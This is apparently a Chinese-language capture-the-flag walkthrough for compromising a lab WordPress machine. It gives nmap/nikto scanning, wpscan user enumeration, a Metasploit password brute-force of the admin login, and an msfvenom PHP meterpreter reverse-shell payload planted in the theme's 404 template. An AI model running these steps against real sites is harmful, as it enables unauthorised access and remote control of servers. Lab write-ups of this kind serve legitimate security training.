nmap -sV 192.168.101.48
nikto -host http://192.168.101.48
發現了secret這個敏感目錄,登錄該目錄下嘗試進入login后臺失敗
修改/etc/hosts文件,添加多一條域名解析記錄就可成功訪問
首先我們必須知道該網站都存在哪些用戶名,我們這里使用wpscan來對該網站的用戶名進行暴力破解
wpscan --url http://vtcsec/secret --enumerate u
破解到一個admin的賬號
接下來我們的重頭戲來了!使用msfconsole對其密碼進行暴力窮舉
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set rhosts 靶機IP
set username admin
set pass_file /usr/share/wordlists/dirb/common.txt
set targeturi /secret/
run
破解出用戶名和密碼均為admin
在利用handler模塊進行監聽反彈shell,也是在msf中進行
back
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 本機IP
run
登錄后臺后,找到editors目錄下的404Template,使用生成的靜荷替換404模板里的內容
msfvenom -p php/meterpreter/reverse_tcp lhost=本機IP lport=4444 -f raw